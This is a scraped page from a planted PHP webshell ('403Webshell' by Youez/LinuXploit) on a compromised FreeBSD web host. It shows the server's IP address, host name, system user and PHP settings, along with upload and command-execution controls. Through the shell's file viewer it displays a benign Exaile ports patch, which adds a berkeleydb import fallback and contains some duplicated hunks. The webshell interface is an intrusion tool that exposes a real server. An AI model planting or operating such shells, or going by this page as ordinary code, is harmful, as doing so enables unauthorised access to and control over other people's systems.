403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/audio/exaile/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/audio/exaile/files/patch-xl_common.py
https://github.com/exaile/exaile/issues/770

--- xl/common.py.orig	2021-03-28 10:31:17 UTC
+++ xl/common.py
@@ -44,7 +44,12 @@ import weakref
 import urllib.request
 import weakref
 
-import bsddb3 as bsddb
+# TODO: Flip these around once we've done more testing with berkeleydb
+try:
+    import bsddb3 as bsddb
+except ImportError:
+    import berkeleydb as bsddb
+
 from gi.repository import Gio, GLib, GObject
 
 from xl import shelve_compat
@@ -394,8 +399,8 @@ def open_shelf(path):
     """
     shelve_compat.ensure_shelve_compat()
 
     # As of Exaile 4, new DBs will only be created as Berkeley DB Hash databases
     # using either bsddb3 (external) or bsddb (stdlib but sometimes removed).
     # Existing DBs created with other backends will be migrated to Berkeley DB.
     # We do this because BDB is generally considered more performant,
     # and because gdbm currently doesn't work at all in MSYS2.
@@ -394,8 +399,8 @@ def open_shelf(path):
     shelve_compat.ensure_shelve_compat()
 
-    # As of Exaile 4, new DBs will only be created as Berkeley DB Hash databases
-    # using either bsddb3 (external) or bsddb (stdlib but sometimes removed).
+    # As of Exaile 4, DBs are created as Berkeley DB Hash databases using
+    # either berkeleydb or bsddb3.
     # Existing DBs created with other backends will be migrated to Berkeley DB.
     # We do this because BDB is generally considered more performant,

Youez - 2016 - github.com/yon3zu
LinuXploit